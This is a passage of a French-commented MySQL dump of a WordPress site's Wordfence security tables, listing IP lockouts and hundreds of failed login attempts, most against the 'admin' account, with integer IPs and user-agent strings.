(26099435, 1123633942, 1),
(26099590, 1123633942, 1),
(26099615, 1123633942, 1),
(26099670, 3746233170, 4),
(26099671, 3746233170, 14),
(26100400, 1123634950, 1),
(26101081, 1123634950, 2),
(26101482, 1123631564, 1),
(26101617, 1123631564, 1),
(26102331, 1123631564, 1),
(26102895, 1123631270, 2),
(26103468, 1123631270, 1),
(26104057, 1123631270, 1),
(26106349, 1123631814, 2),
(26108046, 1123631270, 1),
(26113903, 1532393715, 1);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfLockedOut`
--

CREATE TABLE `www2_wfLockedOut` (
  `IP` int(10) UNSIGNED NOT NULL,
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) UNSIGNED DEFAULT '0',
  `blockedHits` int(10) UNSIGNED DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfLockedOut`
--

INSERT INTO `www2_wfLockedOut` (`IP`, `blockedTime`, `reason`, `lastAttempt`, `blockedHits`) VALUES
(1840808480, 1497192285, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(2032808987, 1497197627, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(3682725338, 1498448313, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1466596995, 1497955206, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1255184110, 1498406406, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(887721709, 1499521764, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(136172254, 1497016384, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1168352192, 1496778654, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1728496878, 1496843770, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1049988935, 1496512596, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(96963116, 1496807811, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(3489067105, 1496649439, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1539837113, 1496016405, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(2760119799, 1493230816, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1589523921, 1493333441, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'administrator\'', 1493347507, 158);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfLocs`
--

CREATE TABLE `www2_wfLocs` (
  `IP` int(10) UNSIGNED NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `failed` tinyint(3) UNSIGNED NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT '0.0000000',
  `lon` float(10,7) DEFAULT '0.0000000'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfLogins`
--

CREATE TABLE `www2_wfLogins` (
  `id` int(10) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `fail` tinyint(3) UNSIGNED NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `UA` text
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfLogins`
--

INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(101788, 1498073279.949281, 1, 'loginFailValidUsername', 'admin', 1, 3181235630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101789, 1498073688.670281, 1, 'loginFailValidUsername', 'admin', 1, 1048588454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101790, 1498073689.864582, 1, 'loginFailValidUsername', 'admin', 1, 1048588454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101791, 1498075109.218547, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101792, 1498076382.462599, 1, 'loginFailValidUsername', 'admin', 1, 774982988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101793, 1498076383.551099, 1, 'loginFailValidUsername', 'admin', 1, 774982988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101794, 1498080682.271613, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101795, 1498081143.041395, 1, 'loginFailValidUsername', 'admin', 1, 3398322094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101796, 1498081144.498527, 1, 'loginFailValidUsername', 'admin', 1, 3398322094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101797, 1498086252.860838, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101798, 1498089428.373546, 1, 'loginFailValidUsername', 'admin', 1, 3305249319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101799, 1498092121.459347, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101800, 1498095704.503463, 1, 'loginFailValidUsername', 'admin', 1, 469753397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101801, 1498095706.134523, 1, 'loginFailValidUsername', 'admin', 1, 469753397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101802, 1498099069.425965, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101803, 1498099839.511774, 1, 'loginFailValidUsername', 'admin', 1, 694796386, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101804, 1498099840.609148, 1, 'loginFailValidUsername', 'admin', 1, 694796386, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101805, 1498100668.263673, 1, 'loginFailValidUsername', 'admin', 1, 1950532940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101806, 1498100669.541004, 1, 'loginFailValidUsername', 'admin', 1, 1950532940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101807, 1498102063.342985, 1, 'loginFailValidUsername', 'admin', 1, 3551433226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101808, 1498102064.842611, 1, 'loginFailValidUsername', 'admin', 1, 3551433226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101809, 1498103802.810592, 1, 'loginFailValidUsername', 'admin', 1, 1442374565, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; chromeframe; .NET CLR 2.0.50727)'),
(101810, 1498105147.419556, 1, 'loginFailValidUsername', 'admin', 1, 3139973540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101811, 1498105508.725912, 1, 'loginFailValidUsername', 'admin', 1, 1091807106, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; AskTbORJ/5.14.1.20007; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(101812, 1498105998.825602, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101813, 1498110750.274674, 1, 'loginFailValidUsername', 'admin', 1, 1001457484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101814, 1498113169.875662, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101815, 1498114197.276861, 1, 'loginFailValidUsername', 'admin', 1, 466191216, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101816, 1498114198.918312, 1, 'loginFailValidUsername', 'admin', 1, 466191216, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101817, 1498115465.268262, 1, 'loginFailValidUsername', 'admin', 1, 1504899105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101818, 1498115466.339208, 1, 'loginFailValidUsername', 'admin', 1, 1504899105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101819, 1498120936.927215, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101820, 1498123032.393821, 1, 'loginFailValidUsername', 'admin', 1, 1731167259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101821, 1498123034.033108, 1, 'loginFailValidUsername', 'admin', 1, 1731167259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101822, 1498123952.156505, 1, 'loginFailValidUsername', 'admin', 1, 19917958, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101823, 1498124291.512175, 1, 'loginFailValidUsername', 'admin', 1, 2959596063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101824, 1498124294.133243, 1, 'loginFailValidUsername', 'admin', 1, 2959596063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101825, 1498124944.836009, 1, 'loginFailValidUsername', 'admin', 1, 1337291349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101826, 1498124946.055550, 1, 'loginFailValidUsername', 'admin', 1, 1337291349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101827, 1498125216.602381, 1, 'loginFailValidUsername', 'admin', 1, 1393178435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101828, 1498125217.625442, 1, 'loginFailValidUsername', 'admin', 1, 1393178435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101829, 1498125904.153715, 1, 'loginFailValidUsername', 'admin', 1, 1892279657, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101830, 1498125905.803015, 1, 'loginFailValidUsername', 'admin', 1, 1892279657, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101831, 1498129025.478472, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101832, 1498137406.080605, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101833, 1498137643.772358, 1, 'loginFailValidUsername', 'admin', 1, 835697955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101834, 1498137644.948752, 1, 'loginFailValidUsername', 'admin', 1, 835697955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101835, 1498138691.660074, 1, 'loginFailValidUsername', 'admin', 1, 1829643291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101836, 1498138795.989653, 1, 'loginFailValidUsername', 'admin', 1, 3070050086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101837, 1498138797.621807, 1, 'loginFailValidUsername', 'admin', 1, 3070050086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101838, 1498140454.123668, 1, 'loginFailValidUsername', 'admin', 1, 2576789442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101839, 1498140455.640521, 1, 'loginFailValidUsername', 'admin', 1, 2576789442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101840, 1498140460.218725, 1, 'loginFailValidUsername', 'admin', 1, 1441388581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101841, 1498140461.310709, 1, 'loginFailValidUsername', 'admin', 1, 1441388581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101842, 1498141271.485053, 1, 'loginFailInvalidUsername', 'training', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101843, 1498141273.824132, 1, 'loginFailInvalidUsername', 'notre', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101844, 1498141276.225338, 1, 'loginFailInvalidUsername', 'pour', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101845, 1498141278.532604, 1, 'loginFailInvalidUsername', 'cross', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101846, 1498141280.588080, 1, 'loginFailInvalidUsername', 'objectifs', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101847, 1498141282.638240, 1, 'loginFailInvalidUsername', 'venez', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101848, 1498141284.583763, 1, 'loginFailInvalidUsername', 'outils', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101849, 1498141286.682574, 1, 'loginFailInvalidUsername', 'professionnel', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101850, 1498141288.781405, 1, 'loginFailInvalidUsername', 'travail', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101851, 1498141290.775118, 1, 'loginFailInvalidUsername', 'namur', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101852, 1498144027.336804, 1, 'loginFailValidUsername', 'admin', 1, 84760548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101853, 1498144028.379708, 1, 'loginFailValidUsername', 'admin', 1, 84760548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101854, 1498146768.907335, 1, 'loginFailValidUsername', 'admin', 1, 656944339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101855, 1498146770.195485, 1, 'loginFailValidUsername', 'admin', 1, 656944339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101856, 1498146833.297721, 1, 'loginFailValidUsername', 'admin', 1, 1497940443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101857, 1498146834.311214, 1, 'loginFailValidUsername', 'admin', 1, 1497940443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101858, 1498147152.587986, 1, 'loginFailValidUsername', 'admin', 1, 2588453269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101859, 1498147153.839592, 1, 'loginFailValidUsername', 'admin', 1, 2588453269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101860, 1498147412.678068, 1, 'loginFailValidUsername', 'admin', 1, 1408934455, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101861, 1498147413.673037, 1, 'loginFailValidUsername', 'admin', 1, 1408934455, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101862, 1498147525.611247, 1, 'loginFailValidUsername', 'admin', 1, 3010263913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101863, 1498147529.105414, 1, 'loginFailValidUsername', 'admin', 1, 3010263913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101864, 1498149959.365678, 1, 'loginFailValidUsername', 'admin', 1, 2997135959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101865, 1498149960.340911, 1, 'loginFailValidUsername', 'admin', 1, 2997135959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101866, 1498151336.809739, 1, 'loginFailValidUsername', 'admin', 1, 16900493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101867, 1498151338.430166, 1, 'loginFailValidUsername', 'admin', 1, 16900493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101868, 1498152360.771543, 1, 'loginFailValidUsername', 'admin', 1, 1848408356, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101869, 1498152364.541973, 1, 'loginFailValidUsername', 'admin', 1, 1848408356, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101870, 1498153700.031529, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101871, 1498153896.303696, 1, 'loginFailValidUsername', 'admin', 1, 1327036161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101872, 1498153897.281607, 1, 'loginFailValidUsername', 'admin', 1, 1327036161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101873, 1498154027.617995, 1, 'loginFailValidUsername', 'admin', 1, 1379151870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101874, 1498154028.847519, 1, 'loginFailValidUsername', 'admin', 1, 1379151870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101875, 1498154167.230060, 1, 'loginFailValidUsername', 'admin', 1, 1571915512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101876, 1498154168.421076, 1, 'loginFailValidUsername', 'admin', 1, 1571915512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101877, 1498158618.178440, 1, 'loginFailValidUsername', 'admin', 1, 1892536336, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101878, 1498158914.919159, 1, 'loginFailValidUsername', 'admin', 1, 1303022440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101879, 1498158915.909809, 1, 'loginFailValidUsername', 'admin', 1, 1303022440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101880, 1498159642.986855, 1, 'loginFailValidUsername', 'admin', 1, 1333073033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101881, 1498159643.972230, 1, 'loginFailValidUsername', 'admin', 1, 1333073033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101882, 1498162868.596496, 1, 'loginFailValidUsername', 'admin', 1, 693563302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101883, 1498162869.933994, 1, 'loginFailValidUsername', 'admin', 1, 693563302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101884, 1498165109.092855, 1, 'loginFailValidUsername', 'admin', 1, 1578483521, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101885, 1498165110.064538, 1, 'loginFailValidUsername', 'admin', 1, 1578483521, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101886, 1498165608.084014, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101887, 1498171249.473969, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101888, 1498171460.628033, 1, 'loginFailValidUsername', 'admin', 1, 3135874693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101889, 1498171462.021751, 1, 'loginFailValidUsername', 'admin', 1, 3135874693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101890, 1498173054.892393, 1, 'loginFailValidUsername', 'admin', 1, 1609143403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101891, 1498173055.871758, 1, 'loginFailValidUsername', 'admin', 1, 1609143403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101892, 1498174667.542557, 1, 'loginFailValidUsername', 'admin', 1, 634588360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101893, 1498174668.858912, 1, 'loginFailValidUsername', 'admin', 1, 634588360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101894, 1498176996.479397, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101895, 1498180031.903956, 1, 'loginFailValidUsername', 'admin', 1, 1276156434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101896, 1498180033.558943, 1, 'loginFailValidUsername', 'admin', 1, 1276156434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101897, 1498183470.216631, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101898, 1498185949.297631, 1, 'loginFailValidUsername', 'admin', 1, 3171175154, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101899, 1498190665.571990, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101900, 1498190737.027699, 1, 'loginFailValidUsername', 'admin', 1, 1892514215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101901, 1498190738.679271, 1, 'loginFailValidUsername', 'admin', 1, 1892514215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101902, 1498191697.268322, 1, 'loginFailValidUsername', 'admin', 1, 1239185676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101903, 1498192947.621656, 1, 'loginFailValidUsername', 'admin', 1, 2630103348, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101904, 1498194920.626033, 1, 'loginFailValidUsername', 'admin', 1, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101905, 1498194921.540531, 1, 'loginFailValidUsername', 'admin', 1, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101906, 1498195646.090655, 1, 'loginFailValidUsername', 'admin', 1, 1113016646, 'Mozilla/5.0 (en-us;)'),
(101907, 1498197360.517809, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1547655939, 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0'),
(101908, 1498197677.767886, 1, 'loginFailValidUsername', 'admin', 1, 3005362720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101909, 1498197679.089500, 1, 'loginFailValidUsername', 'admin', 1, 3005362720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101910, 1498197886.075140, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101911, 1498198773.179999, 1, 'loginFailValidUsername', 'admin', 1, 2631157514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101912, 1498198775.026433, 1, 'loginFailValidUsername', 'admin', 1, 2631157514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101913, 1498205298.066063, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101914, 1498205715.733355, 1, 'loginFailValidUsername', 'admin', 1, 3412439576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101915, 1498205717.103657, 1, 'loginFailValidUsername', 'admin', 1, 3412439576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
